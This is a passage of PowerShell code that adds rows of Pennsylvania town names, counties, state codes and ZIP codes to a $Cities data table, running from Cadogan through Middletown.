$null = $Cities.Rows.Add("Cadogan","Armstrong","Pennsylvania","PA","42","16212") + $null = $Cities.Rows.Add("Callensburg","Clarion","Pennsylvania","PA","42","16213") + $null = $Cities.Rows.Add("Clarion","Clarion","Pennsylvania","PA","42","16214") + $null = $Cities.Rows.Add("Cooksburg","Forest","Pennsylvania","PA","42","16217") + $null = $Cities.Rows.Add("Cowansville","Armstrong","Pennsylvania","PA","42","16218") + $null = $Cities.Rows.Add("Dayton","Armstrong","Pennsylvania","PA","42","16222") + $null = $Cities.Rows.Add("Distant","Armstrong","Pennsylvania","PA","42","16223") + $null = $Cities.Rows.Add("Fairmount city","Clarion","Pennsylvania","PA","42","16224") + $null = $Cities.Rows.Add("Ford city","Armstrong","Pennsylvania","PA","42","16226") + $null = $Cities.Rows.Add("Ford cliff","Armstrong","Pennsylvania","PA","42","16228") + $null = $Cities.Rows.Add("Freeport","Armstrong","Pennsylvania","PA","42","16229") + $null = $Cities.Rows.Add("Hawthorn","Clarion","Pennsylvania","PA","42","16230") + $null = $Cities.Rows.Add("Knox","Clarion","Pennsylvania","PA","42","16232") + $null = $Cities.Rows.Add("Leeper","Clarion","Pennsylvania","PA","42","16233") + $null = $Cities.Rows.Add("Limestone","Clarion","Pennsylvania","PA","42","16234") + $null = $Cities.Rows.Add("Lucinda","Clarion","Pennsylvania","PA","42","16235") + $null = $Cities.Rows.Add("Mc grann","Armstrong","Pennsylvania","PA","42","16236") + $null = $Cities.Rows.Add("Manorville","Armstrong","Pennsylvania","PA","42","16238") + $null = $Cities.Rows.Add("Marienville","Forest","Pennsylvania","PA","42","16239") + $null = $Cities.Rows.Add("Mayport","Armstrong","Pennsylvania","PA","42","16240") + $null = $Cities.Rows.Add("New bethlehem","Clarion","Pennsylvania","PA","42","16242") + $null = $Cities.Rows.Add("Nu mine","Armstrong","Pennsylvania","PA","42","16244") + $null = $Cities.Rows.Add("Oak ridge","Armstrong","Pennsylvania","PA","42","16245") + $null = $Cities.Rows.Add("Plumville","Indiana","Pennsylvania","PA","42","16246") + $null = $Cities.Rows.Add("Huey","Clarion","Pennsylvania","PA","42","16248") + $null = $Cities.Rows.Add("Rural valley","Armstrong","Pennsylvania","PA","42","16249") + $null = $Cities.Rows.Add("Sagamore","Armstrong","Pennsylvania","PA","42","16250") + $null = $Cities.Rows.Add("Seminole","Armstrong","Pennsylvania","PA","42","16253") + $null = $Cities.Rows.Add("Shippenville","Clarion","Pennsylvania","PA","42","16254") + $null = $Cities.Rows.Add("Sligo","Clarion","Pennsylvania","PA","42","16255") + $null = $Cities.Rows.Add("Smicksburg","Indiana","Pennsylvania","PA","42","16256") + $null = $Cities.Rows.Add("Strattanville","Clarion","Pennsylvania","PA","42","16258") + $null = $Cities.Rows.Add("Templeton","Armstrong","Pennsylvania","PA","42","16259") + $null = $Cities.Rows.Add("Vowinckel","Clarion","Pennsylvania","PA","42","16260") + $null = $Cities.Rows.Add("Craigsville","Armstrong","Pennsylvania","PA","42","16262") + $null = $Cities.Rows.Add("Yatesboro","Armstrong","Pennsylvania","PA","42","16263") + $null = $Cities.Rows.Add("Zcta 162hh","Armstrong","Pennsylvania","PA","42","162HH") + $null = $Cities.Rows.Add("Zcta 162xx","Forest","Pennsylvania","PA","42","162XX") + $null = $Cities.Rows.Add("Oil city","Venango","Pennsylvania","PA","42","16301") + $null = $Cities.Rows.Add("Carlton","Mercer","Pennsylvania","PA","42","16311") + $null = $Cities.Rows.Add("Clarendon","Warren","Pennsylvania","PA","42","16313") + $null = $Cities.Rows.Add("Cochranton","Crawford","Pennsylvania","PA","42","16314") + $null = $Cities.Rows.Add("Conneaut lake","Crawford","Pennsylvania","PA","42","16316") + $null = $Cities.Rows.Add("Cooperstown","Venango","Pennsylvania","PA","42","16317") + $null = $Cities.Rows.Add("Cranberry","Venango","Pennsylvania","PA","42","16319") + $null = $Cities.Rows.Add("East hickory","Forest","Pennsylvania","PA","42","16321") + $null = $Cities.Rows.Add("Endeavor","Forest","Pennsylvania","PA","42","16322") + $null = $Cities.Rows.Add("Franklin","Venango","Pennsylvania","PA","42","16323") + $null = $Cities.Rows.Add("Fryburg","Clarion","Pennsylvania","PA","42","16326") + $null = $Cities.Rows.Add("Guys mills","Crawford","Pennsylvania","PA","42","16327") + $null = $Cities.Rows.Add("Irvine","Warren","Pennsylvania","PA","42","16329") + $null = $Cities.Rows.Add("Kossuth","Clarion","Pennsylvania","PA","42","16331") + $null = $Cities.Rows.Add("Lickingville","Clarion","Pennsylvania","PA","42","16332") + $null = $Cities.Rows.Add("Ludlow","Mc Kean","Pennsylvania","PA","42","16333") + $null = $Cities.Rows.Add("Marble","Clarion","Pennsylvania","PA","42","16334") + $null = $Cities.Rows.Add("Meadville","Crawford","Pennsylvania","PA","42","16335") + $null = $Cities.Rows.Add("Pittsfield","Warren","Pennsylvania","PA","42","16340") + $null = $Cities.Rows.Add("Pleasantville","Venango","Pennsylvania","PA","42","16341") + $null = $Cities.Rows.Add("Polk","Venango","Pennsylvania","PA","42","16342") + $null = $Cities.Rows.Add("Reno","Venango","Pennsylvania","PA","42","16343") + $null = $Cities.Rows.Add("Rouseville","Venango","Pennsylvania","PA","42","16344") + $null = $Cities.Rows.Add("Russell","Warren","Pennsylvania","PA","42","16345") + $null = $Cities.Rows.Add("Seneca","Venango","Pennsylvania","PA","42","16346") + $null = $Cities.Rows.Add("Sheffield","Warren","Pennsylvania","PA","42","16347") + $null = $Cities.Rows.Add("Sugar grove","Warren","Pennsylvania","PA","42","16350") + $null = $Cities.Rows.Add("Tidioute","Warren","Pennsylvania","PA","42","16351") + $null = $Cities.Rows.Add("Tiona","Warren","Pennsylvania","PA","42","16352") + $null = $Cities.Rows.Add("Tionesta","Forest","Pennsylvania","PA","42","16353") + $null = $Cities.Rows.Add("Titusville","Crawford","Pennsylvania","PA","42","16354") + $null = $Cities.Rows.Add("Townville","Crawford","Pennsylvania","PA","42","16360") + $null = $Cities.Rows.Add("Tylersburg","Clarion","Pennsylvania","PA","42","16361") + $null = $Cities.Rows.Add("Utica","Venango","Pennsylvania","PA","42","16362") + $null = $Cities.Rows.Add("Venus","Venango","Pennsylvania","PA","42","16364") + $null = $Cities.Rows.Add("North warren","Warren","Pennsylvania","PA","42","16365") + $null = $Cities.Rows.Add("West hickory","Forest","Pennsylvania","PA","42","16370") + $null = $Cities.Rows.Add("Youngsville","Warren","Pennsylvania","PA","42","16371") + $null = $Cities.Rows.Add("Clintonville","Venango","Pennsylvania","PA","42","16372") + $null = $Cities.Rows.Add("Emlenton","Venango","Pennsylvania","PA","42","16373") + $null = $Cities.Rows.Add("Kennerdell","Venango","Pennsylvania","PA","42","16374") + $null = $Cities.Rows.Add("Zcta 163hh","Clarion","Pennsylvania","PA","42","163HH") + $null = $Cities.Rows.Add("Zcta 163xx","Warren","Pennsylvania","PA","42","163XX") + $null = $Cities.Rows.Add("Lundys lane","Erie","Pennsylvania","PA","42","16401") + $null = $Cities.Rows.Add("Bear lake","Warren","Pennsylvania","PA","42","16402") + $null = $Cities.Rows.Add("Cambridge spring","Crawford","Pennsylvania","PA","42","16403") + $null = $Cities.Rows.Add("Centerville","Crawford","Pennsylvania","PA","42","16404") + $null = $Cities.Rows.Add("Columbus","Warren","Pennsylvania","PA","42","16405") + $null = $Cities.Rows.Add("Conneautville","Crawford","Pennsylvania","PA","42","16406") + $null = $Cities.Rows.Add("Corry","Erie","Pennsylvania","PA","42","16407") + $null = $Cities.Rows.Add("Cranesville","Erie","Pennsylvania","PA","42","16410") + $null = $Cities.Rows.Add("East springfield","Erie","Pennsylvania","PA","42","16411") + $null = $Cities.Rows.Add("Edinboro","Erie","Pennsylvania","PA","42","16412") + $null = $Cities.Rows.Add("Fairview","Erie","Pennsylvania","PA","42","16415") + $null = $Cities.Rows.Add("Garland","Warren","Pennsylvania","PA","42","16416") + $null = $Cities.Rows.Add("Girard","Erie","Pennsylvania","PA","42","16417") + $null = $Cities.Rows.Add("Grand valley","Warren","Pennsylvania","PA","42","16420") + $null = $Cities.Rows.Add("Harborcreek","Erie","Pennsylvania","PA","42","16421") + $null = $Cities.Rows.Add("Harmonsburg","Crawford","Pennsylvania","PA","42","16422") + $null = $Cities.Rows.Add("Lake city","Erie","Pennsylvania","PA","42","16423") + $null = $Cities.Rows.Add("Espyville","Crawford","Pennsylvania","PA","42","16424") + $null = $Cities.Rows.Add("Mc kean","Erie","Pennsylvania","PA","42","16426") + $null = $Cities.Rows.Add("Mill village","Erie","Pennsylvania","PA","42","16427") + $null = $Cities.Rows.Add("North east","Erie","Pennsylvania","PA","42","16428") + $null = $Cities.Rows.Add("Saegertown","Crawford","Pennsylvania","PA","42","16433") + $null = $Cities.Rows.Add("Spartansburg","Crawford","Pennsylvania","PA","42","16434") + $null = $Cities.Rows.Add("Springboro","Crawford","Pennsylvania","PA","42","16435") + $null = $Cities.Rows.Add("Spring creek","Warren","Pennsylvania","PA","42","16436") + $null = $Cities.Rows.Add("Union city","Erie","Pennsylvania","PA","42","16438") + $null = $Cities.Rows.Add("Venango","Crawford","Pennsylvania","PA","42","16440") + $null = $Cities.Rows.Add("Waterford","Erie","Pennsylvania","PA","42","16441") + $null = $Cities.Rows.Add("Wattsburg","Erie","Pennsylvania","PA","42","16442") + $null = $Cities.Rows.Add("West springfield","Erie","Pennsylvania","PA","42","16443") + $null = $Cities.Rows.Add("Zcta 164hh","Crawford","Pennsylvania","PA","42","164HH") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16501") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16502") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16503") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16504") + $null = $Cities.Rows.Add("Presque isle","Erie","Pennsylvania","PA","42","16505") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16506") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16507") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16508") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16509") + $null = $Cities.Rows.Add("Wesleyville","Erie","Pennsylvania","PA","42","16510") + $null = $Cities.Rows.Add("Erie","Erie","Pennsylvania","PA","42","16511") + $null = $Cities.Rows.Add("Zcta 165hh","Erie","Pennsylvania","PA","42","165HH") + $null = $Cities.Rows.Add("Altoona","Blair","Pennsylvania","PA","42","16601") + $null = $Cities.Rows.Add("Altoona","Blair","Pennsylvania","PA","42","16602") + $null = $Cities.Rows.Add("Barree","Huntingdon","Pennsylvania","PA","42","16611") + $null = $Cities.Rows.Add("Ashville","Cambria","Pennsylvania","PA","42","16613") + $null = $Cities.Rows.Add("Beccaria","Clearfield","Pennsylvania","PA","42","16616") + $null = $Cities.Rows.Add("Bellwood","Blair","Pennsylvania","PA","42","16617") + $null = $Cities.Rows.Add("Blandburg","Cambria","Pennsylvania","PA","42","16619") + $null = $Cities.Rows.Add("Brisbin","Clearfield","Pennsylvania","PA","42","16620") + $null = $Cities.Rows.Add("Broad top","Huntingdon","Pennsylvania","PA","42","16621") + $null = $Cities.Rows.Add("Calvin","Huntingdon","Pennsylvania","PA","42","16622") + $null = $Cities.Rows.Add("Cassville","Huntingdon","Pennsylvania","PA","42","16623") + $null = $Cities.Rows.Add("Chest springs","Cambria","Pennsylvania","PA","42","16624") + $null = $Cities.Rows.Add("Claysburg","Blair","Pennsylvania","PA","42","16625") + $null = $Cities.Rows.Add("Coalport","Clearfield","Pennsylvania","PA","42","16627") + $null = $Cities.Rows.Add("Cresson","Cambria","Pennsylvania","PA","42","16630") + $null = $Cities.Rows.Add("Curryville","Blair","Pennsylvania","PA","42","16631") + $null = $Cities.Rows.Add("Defiance","Bedford","Pennsylvania","PA","42","16633") + $null = $Cities.Rows.Add("Dudley","Huntingdon","Pennsylvania","PA","42","16634") + $null = $Cities.Rows.Add("Duncansville","Blair","Pennsylvania","PA","42","16635") + $null = $Cities.Rows.Add("Dysart","Cambria","Pennsylvania","PA","42","16636") + $null = $Cities.Rows.Add("East freedom","Blair","Pennsylvania","PA","42","16637") + $null = $Cities.Rows.Add("Entriken","Huntingdon","Pennsylvania","PA","42","16638") + $null = $Cities.Rows.Add("Fallentimber","Cambria","Pennsylvania","PA","42","16639") + $null = $Cities.Rows.Add("Flinton","Cambria","Pennsylvania","PA","42","16640") + $null = $Cities.Rows.Add("Gallitzin","Cambria","Pennsylvania","PA","42","16641") + $null = $Cities.Rows.Add("Glen hope","Clearfield","Pennsylvania","PA","42","16645") + $null = $Cities.Rows.Add("Hastings","Cambria","Pennsylvania","PA","42","16646") + $null = $Cities.Rows.Add("Hesston","Huntingdon","Pennsylvania","PA","42","16647") + $null = $Cities.Rows.Add("Hollidaysburg","Blair","Pennsylvania","PA","42","16648") + $null = $Cities.Rows.Add("Hopewell","Bedford","Pennsylvania","PA","42","16650") + $null = $Cities.Rows.Add("Houtzdale","Clearfield","Pennsylvania","PA","42","16651") + $null = $Cities.Rows.Add("Huntingdon","Huntingdon","Pennsylvania","PA","42","16652") + $null = $Cities.Rows.Add("Imler","Bedford","Pennsylvania","PA","42","16655") + $null = $Cities.Rows.Add("Irvona","Clearfield","Pennsylvania","PA","42","16656") + $null = $Cities.Rows.Add("James creek","Huntingdon","Pennsylvania","PA","42","16657") + $null = $Cities.Rows.Add("Loysburg","Bedford","Pennsylvania","PA","42","16659") + $null = $Cities.Rows.Add("Madera","Clearfield","Pennsylvania","PA","42","16661") + $null = $Cities.Rows.Add("Martinsburg","Blair","Pennsylvania","PA","42","16662") + $null = $Cities.Rows.Add("Morann","Clearfield","Pennsylvania","PA","42","16663") + $null = $Cities.Rows.Add("New enterprise","Bedford","Pennsylvania","PA","42","16664") + $null = $Cities.Rows.Add("Newry","Blair","Pennsylvania","PA","42","16665") + $null = $Cities.Rows.Add("Osceola mills","Clearfield","Pennsylvania","PA","42","16666") + $null = $Cities.Rows.Add("St clairsville","Bedford","Pennsylvania","PA","42","16667") + $null = $Cities.Rows.Add("Patton","Cambria","Pennsylvania","PA","42","16668") + $null = $Cities.Rows.Add("Petersburg","Huntingdon","Pennsylvania","PA","42","16669") + $null = $Cities.Rows.Add("Queen","Bedford","Pennsylvania","PA","42","16670") + $null = $Cities.Rows.Add("Ramey","Clearfield","Pennsylvania","PA","42","16671") + $null = $Cities.Rows.Add("Riddlesburg","Bedford","Pennsylvania","PA","42","16672") + $null = $Cities.Rows.Add("Roaring spring","Blair","Pennsylvania","PA","42","16673") + $null = $Cities.Rows.Add("Robertsdale","Huntingdon","Pennsylvania","PA","42","16674") + $null = $Cities.Rows.Add("Sandy ridge","Centre","Pennsylvania","PA","42","16677") + $null = $Cities.Rows.Add("Saxton","Bedford","Pennsylvania","PA","42","16678") + $null = $Cities.Rows.Add("Six mile run","Bedford","Pennsylvania","PA","42","16679") + $null = $Cities.Rows.Add("Smithmill","Clearfield","Pennsylvania","PA","42","16680") + $null = $Cities.Rows.Add("Smokerun","Clearfield","Pennsylvania","PA","42","16681") + $null = $Cities.Rows.Add("Sproul","Blair","Pennsylvania","PA","42","16682") + $null = $Cities.Rows.Add("Spruce creek","Huntingdon","Pennsylvania","PA","42","16683") + $null = $Cities.Rows.Add("Todd","Huntingdon","Pennsylvania","PA","42","16685") + $null = $Cities.Rows.Add("Tyrone","Blair","Pennsylvania","PA","42","16686") + $null = $Cities.Rows.Add("Waterfall","Fulton","Pennsylvania","PA","42","16689") + $null = $Cities.Rows.Add("Wells tannery","Fulton","Pennsylvania","PA","42","16691") + $null = $Cities.Rows.Add("Westover","Clearfield","Pennsylvania","PA","42","16692") + $null = $Cities.Rows.Add("Ganister","Blair","Pennsylvania","PA","42","16693") + $null = $Cities.Rows.Add("Wood","Huntingdon","Pennsylvania","PA","42","16694") + $null = $Cities.Rows.Add("Woodbury","Bedford","Pennsylvania","PA","42","16695") + $null = $Cities.Rows.Add("Zcta 166hh","Bedford","Pennsylvania","PA","42","166HH") + $null = $Cities.Rows.Add("Zcta 166xx","Huntingdon","Pennsylvania","PA","42","166XX") + $null = $Cities.Rows.Add("Bradford","Mc Kean","Pennsylvania","PA","42","16701") + $null = $Cities.Rows.Add("Austin","Potter","Pennsylvania","PA","42","16720") + $null = $Cities.Rows.Add("Crosby","Mc Kean","Pennsylvania","PA","42","16724") + $null = $Cities.Rows.Add("Custer city","Mc Kean","Pennsylvania","PA","42","16725") + $null = $Cities.Rows.Add("Ormsby","Mc Kean","Pennsylvania","PA","42","16726") + $null = $Cities.Rows.Add("Derrick city","Mc Kean","Pennsylvania","PA","42","16727") + $null = $Cities.Rows.Add("Duke center","Mc Kean","Pennsylvania","PA","42","16729") + $null = $Cities.Rows.Add("East smethport","Mc Kean","Pennsylvania","PA","42","16730") + $null = $Cities.Rows.Add("Eldred","Mc Kean","Pennsylvania","PA","42","16731") + $null = $Cities.Rows.Add("Gifford","Mc Kean","Pennsylvania","PA","42","16732") + $null = $Cities.Rows.Add("Hazel hurst","Mc Kean","Pennsylvania","PA","42","16733") + $null = $Cities.Rows.Add("James city","Elk","Pennsylvania","PA","42","16734") + $null = $Cities.Rows.Add("Kane","Mc Kean","Pennsylvania","PA","42","16735") + $null = $Cities.Rows.Add("Lewis run","Mc Kean","Pennsylvania","PA","42","16738") + $null = $Cities.Rows.Add("Mount jewett","Mc Kean","Pennsylvania","PA","42","16740") + $null = $Cities.Rows.Add("Port allegany","Mc Kean","Pennsylvania","PA","42","16743") + $null = $Cities.Rows.Add("Rew","Mc Kean","Pennsylvania","PA","42","16744") + $null = $Cities.Rows.Add("Rixford","Mc Kean","Pennsylvania","PA","42","16745") + $null = $Cities.Rows.Add("Roulette","Potter","Pennsylvania","PA","42","16746") + $null = $Cities.Rows.Add("Shinglehouse","Potter","Pennsylvania","PA","42","16748") + $null = $Cities.Rows.Add("Smethport","Mc Kean","Pennsylvania","PA","42","16749") + $null = $Cities.Rows.Add("Turtlepoint","Mc Kean","Pennsylvania","PA","42","16750") + $null = $Cities.Rows.Add("Westline","Mc Kean","Pennsylvania","PA","42","16751") + $null = $Cities.Rows.Add("Zcta 167xx","Mc Kean","Pennsylvania","PA","42","167XX") + $null = $Cities.Rows.Add("State college","Centre","Pennsylvania","PA","42","16801") + $null = $Cities.Rows.Add("University park","Centre","Pennsylvania","PA","42","16802") + $null = $Cities.Rows.Add("State college","Centre","Pennsylvania","PA","42","16803") + $null = $Cities.Rows.Add("Aaronsburg","Centre","Pennsylvania","PA","42","16820") + $null = $Cities.Rows.Add("Beech creek","Clinton","Pennsylvania","PA","42","16822") + $null = $Cities.Rows.Add("Pleasant gap","Centre","Pennsylvania","PA","42","16823") + $null = $Cities.Rows.Add("Bigler","Clearfield","Pennsylvania","PA","42","16825") + $null = $Cities.Rows.Add("Blanchard","Centre","Pennsylvania","PA","42","16826") + $null = $Cities.Rows.Add("Boalsburg","Centre","Pennsylvania","PA","42","16827") + $null = $Cities.Rows.Add("Centre hall","Centre","Pennsylvania","PA","42","16828") + $null = $Cities.Rows.Add("Clarence","Centre","Pennsylvania","PA","42","16829") + $null = $Cities.Rows.Add("Clearfield","Clearfield","Pennsylvania","PA","42","16830") + $null = $Cities.Rows.Add("Coburn","Centre","Pennsylvania","PA","42","16832") + $null = $Cities.Rows.Add("Curwensville","Clearfield","Pennsylvania","PA","42","16833") + $null = $Cities.Rows.Add("Drifting","Clearfield","Pennsylvania","PA","42","16834") + $null = $Cities.Rows.Add("Frenchville","Clearfield","Pennsylvania","PA","42","16836") + $null = $Cities.Rows.Add("Glen richey","Clearfield","Pennsylvania","PA","42","16837") + $null = $Cities.Rows.Add("Grampian","Clearfield","Pennsylvania","PA","42","16838") + $null = $Cities.Rows.Add("Grassflat","Clearfield","Pennsylvania","PA","42","16839") + $null = $Cities.Rows.Add("Hawk run","Clearfield","Pennsylvania","PA","42","16840") + $null = $Cities.Rows.Add("Howard","Centre","Pennsylvania","PA","42","16841") + $null = $Cities.Rows.Add("Hyde","Clearfield","Pennsylvania","PA","42","16843") + $null = $Cities.Rows.Add("Julian","Centre","Pennsylvania","PA","42","16844") + $null = $Cities.Rows.Add("Karthaus","Clearfield","Pennsylvania","PA","42","16845") + $null = $Cities.Rows.Add("Kylertown","Clearfield","Pennsylvania","PA","42","16847") + $null = $Cities.Rows.Add("Lamar","Clinton","Pennsylvania","PA","42","16848") + $null = $Cities.Rows.Add("Lanse","Clearfield","Pennsylvania","PA","42","16849") + $null = $Cities.Rows.Add("Lemont","Centre","Pennsylvania","PA","42","16851") + $null = $Cities.Rows.Add("Madisonburg","Centre","Pennsylvania","PA","42","16852") + $null = $Cities.Rows.Add("Milesburg","Centre","Pennsylvania","PA","42","16853") + $null = $Cities.Rows.Add("Millheim","Centre","Pennsylvania","PA","42","16854") + $null = $Cities.Rows.Add("Mineral springs","Clearfield","Pennsylvania","PA","42","16855") + $null = $Cities.Rows.Add("Mingoville","Centre","Pennsylvania","PA","42","16856") + $null = $Cities.Rows.Add("Morrisdale","Clearfield","Pennsylvania","PA","42","16858") + $null = $Cities.Rows.Add("Moshannon","Centre","Pennsylvania","PA","42","16859") + $null = $Cities.Rows.Add("Munson","Clearfield","Pennsylvania","PA","42","16860") + $null = $Cities.Rows.Add("New millport","Clearfield","Pennsylvania","PA","42","16861") + $null = $Cities.Rows.Add("Olanta","Clearfield","Pennsylvania","PA","42","16863") + $null = $Cities.Rows.Add("Orviston","Centre","Pennsylvania","PA","42","16864") + $null = $Cities.Rows.Add("Pennsylvania fur","Centre","Pennsylvania","PA","42","16865") + $null = $Cities.Rows.Add("Philipsburg","Centre","Pennsylvania","PA","42","16866") + $null = $Cities.Rows.Add("Port matilda","Centre","Pennsylvania","PA","42","16870") + $null = $Cities.Rows.Add("Pottersdale","Clearfield","Pennsylvania","PA","42","16871") + $null = $Cities.Rows.Add("Rebersburg","Centre","Pennsylvania","PA","42","16872") + $null = $Cities.Rows.Add("Snow shoe","Centre","Pennsylvania","PA","42","16874") + $null = $Cities.Rows.Add("Spring mills","Centre","Pennsylvania","PA","42","16875") + $null = $Cities.Rows.Add("Wallaceton","Clearfield","Pennsylvania","PA","42","16876") + $null = $Cities.Rows.Add("Warriors mark","Huntingdon","Pennsylvania","PA","42","16877") + $null = $Cities.Rows.Add("West decatur","Clearfield","Pennsylvania","PA","42","16878") + $null = $Cities.Rows.Add("Winburne","Clearfield","Pennsylvania","PA","42","16879") + $null = $Cities.Rows.Add("Woodland","Clearfield","Pennsylvania","PA","42","16881") + $null = $Cities.Rows.Add("Woodward","Centre","Pennsylvania","PA","42","16882") + $null = $Cities.Rows.Add("Zcta 168hh","Centre","Pennsylvania","PA","42","168HH") + $null = $Cities.Rows.Add("Zcta 168xx","Centre","Pennsylvania","PA","42","168XX") + $null = $Cities.Rows.Add("Wellsboro","Tioga","Pennsylvania","PA","42","16901") + $null = $Cities.Rows.Add("Arnot","Tioga","Pennsylvania","PA","42","16911") + $null = $Cities.Rows.Add("Blossburg","Tioga","Pennsylvania","PA","42","16912") + $null = $Cities.Rows.Add("Columbia cross r","Bradford","Pennsylvania","PA","42","16914") + $null = $Cities.Rows.Add("Oswayo","Potter","Pennsylvania","PA","42","16915") + $null = $Cities.Rows.Add("Covington","Tioga","Pennsylvania","PA","42","16917") + $null = $Cities.Rows.Add("Cowanesque","Tioga","Pennsylvania","PA","42","16918") + $null = $Cities.Rows.Add("Elkland","Tioga","Pennsylvania","PA","42","16920") + $null = $Cities.Rows.Add("Gaines","Tioga","Pennsylvania","PA","42","16921") + $null = $Cities.Rows.Add("Galeton","Potter","Pennsylvania","PA","42","16922") + $null = $Cities.Rows.Add("North bingham","Potter","Pennsylvania","PA","42","16923") + $null = $Cities.Rows.Add("Gillett","Bradford","Pennsylvania","PA","42","16925") + $null = $Cities.Rows.Add("Granville summit","Bradford","Pennsylvania","PA","42","16926") + $null = $Cities.Rows.Add("Harrison valley","Potter","Pennsylvania","PA","42","16927") + $null = $Cities.Rows.Add("Knoxville","Tioga","Pennsylvania","PA","42","16928") + $null = $Cities.Rows.Add("Lawrenceville","Tioga","Pennsylvania","PA","42","16929") + $null = $Cities.Rows.Add("Liberty","Tioga","Pennsylvania","PA","42","16930") + $null = $Cities.Rows.Add("Mainesburg","Tioga","Pennsylvania","PA","42","16932") + $null = $Cities.Rows.Add("Mansfield","Tioga","Pennsylvania","PA","42","16933") + $null = $Cities.Rows.Add("Middlebury cente","Tioga","Pennsylvania","PA","42","16935") + $null = $Cities.Rows.Add("Millerton","Tioga","Pennsylvania","PA","42","16936") + $null = $Cities.Rows.Add("Mills","Potter","Pennsylvania","PA","42","16937") + $null = $Cities.Rows.Add("Morris","Tioga","Pennsylvania","PA","42","16938") + $null = $Cities.Rows.Add("Morris run","Tioga","Pennsylvania","PA","42","16939") + $null = $Cities.Rows.Add("Nelson","Tioga","Pennsylvania","PA","42","16940") + $null = $Cities.Rows.Add("Genesee","Potter","Pennsylvania","PA","42","16941") + $null = $Cities.Rows.Add("Osceola","Tioga","Pennsylvania","PA","42","16942") + $null = $Cities.Rows.Add("Sabinsville","Tioga","Pennsylvania","PA","42","16943") + $null = $Cities.Rows.Add("Tioga","Tioga","Pennsylvania","PA","42","16946") + $null = $Cities.Rows.Add("Troy","Bradford","Pennsylvania","PA","42","16947") + $null = $Cities.Rows.Add("Ulysses","Potter","Pennsylvania","PA","42","16948") + $null = $Cities.Rows.Add("Little marsh","Tioga","Pennsylvania","PA","42","16950") + $null = $Cities.Rows.Add("Zcta 169hh","Tioga","Pennsylvania","PA","42","169HH") + $null = $Cities.Rows.Add("Zcta 169xx","Lycoming","Pennsylvania","PA","42","169XX") + $null = $Cities.Rows.Add("Allensville","Mifflin","Pennsylvania","PA","42","17002") + $null = $Cities.Rows.Add("Annville","Lebanon","Pennsylvania","PA","42","17003") + $null = $Cities.Rows.Add("Belleville","Mifflin","Pennsylvania","PA","42","17004") + $null = $Cities.Rows.Add("Berrysburg","Dauphin","Pennsylvania","PA","42","17005") + $null = $Cities.Rows.Add("Blain","Perry","Pennsylvania","PA","42","17006") + $null = $Cities.Rows.Add("Boiling springs","Cumberland","Pennsylvania","PA","42","17007") + $null = $Cities.Rows.Add("Burnham","Mifflin","Pennsylvania","PA","42","17009") + $null = $Cities.Rows.Add("Campbelltown","Lebanon","Pennsylvania","PA","42","17010") + $null = $Cities.Rows.Add("Shiremanstown","Cumberland","Pennsylvania","PA","42","17011") + $null = $Cities.Rows.Add("Carlisle barrack","Cumberland","Pennsylvania","PA","42","17013") + $null = $Cities.Rows.Add("Cornwall","Lebanon","Pennsylvania","PA","42","17016") + $null = $Cities.Rows.Add("Dalmatia","Northumberland","Pennsylvania","PA","42","17017") + $null = $Cities.Rows.Add("Dauphin","Dauphin","Pennsylvania","PA","42","17018") + $null = $Cities.Rows.Add("Dillsburg","York","Pennsylvania","PA","42","17019") + $null = $Cities.Rows.Add("Duncannon","Perry","Pennsylvania","PA","42","17020") + $null = $Cities.Rows.Add("East waterford","Juniata","Pennsylvania","PA","42","17021") + $null = $Cities.Rows.Add("Elizabethtown","Lancaster","Pennsylvania","PA","42","17022") + $null = $Cities.Rows.Add("Elizabethville","Dauphin","Pennsylvania","PA","42","17023") + $null = $Cities.Rows.Add("Elliottsburg","Perry","Pennsylvania","PA","42","17024") + $null = $Cities.Rows.Add("Enola","Cumberland","Pennsylvania","PA","42","17025") + $null = $Cities.Rows.Add("Fredericksburg","Lebanon","Pennsylvania","PA","42","17026") + $null = $Cities.Rows.Add("Messiah college","Cumberland","Pennsylvania","PA","42","17027") + $null = $Cities.Rows.Add("Grantville","Dauphin","Pennsylvania","PA","42","17028") + $null = $Cities.Rows.Add("Granville","Mifflin","Pennsylvania","PA","42","17029") + $null = $Cities.Rows.Add("Halifax","Dauphin","Pennsylvania","PA","42","17032") + $null = $Cities.Rows.Add("Hershey","Dauphin","Pennsylvania","PA","42","17033") + $null = $Cities.Rows.Add("Highspire","Dauphin","Pennsylvania","PA","42","17034") + $null = $Cities.Rows.Add("Honey grove","Juniata","Pennsylvania","PA","42","17035") + $null = $Cities.Rows.Add("Hummelstown","Dauphin","Pennsylvania","PA","42","17036") + $null = $Cities.Rows.Add("Ickesburg","Perry","Pennsylvania","PA","42","17037") + $null = $Cities.Rows.Add("Jonestown","Lebanon","Pennsylvania","PA","42","17038") + $null = $Cities.Rows.Add("Landisburg","Perry","Pennsylvania","PA","42","17040") + $null = $Cities.Rows.Add("Lawn","Lebanon","Pennsylvania","PA","42","17041") + $null = $Cities.Rows.Add("Cleona","Lebanon","Pennsylvania","PA","42","17042") + $null = $Cities.Rows.Add("Wormleysburg","Cumberland","Pennsylvania","PA","42","17043") + $null = $Cities.Rows.Add("Lewistown","Mifflin","Pennsylvania","PA","42","17044") + $null = $Cities.Rows.Add("Liverpool","Perry","Pennsylvania","PA","42","17045") + $null = $Cities.Rows.Add("Lebanon","Lebanon","Pennsylvania","PA","42","17046") + $null = $Cities.Rows.Add("Loysville","Perry","Pennsylvania","PA","42","17047") + $null = $Cities.Rows.Add("Lykens","Dauphin","Pennsylvania","PA","42","17048") + $null = $Cities.Rows.Add("Mc alisterville","Juniata","Pennsylvania","PA","42","17049") + $null = $Cities.Rows.Add("Mc veytown","Mifflin","Pennsylvania","PA","42","17051") + $null = $Cities.Rows.Add("Mapleton depot","Huntingdon","Pennsylvania","PA","42","17052") + $null = $Cities.Rows.Add("Marysville","Perry","Pennsylvania","PA","42","17053") + $null = $Cities.Rows.Add("Hampden","Cumberland","Pennsylvania","PA","42","17055") + $null = $Cities.Rows.Add("Middletown","Dauphin","Pennsylvania","PA","42","17057") + $null = 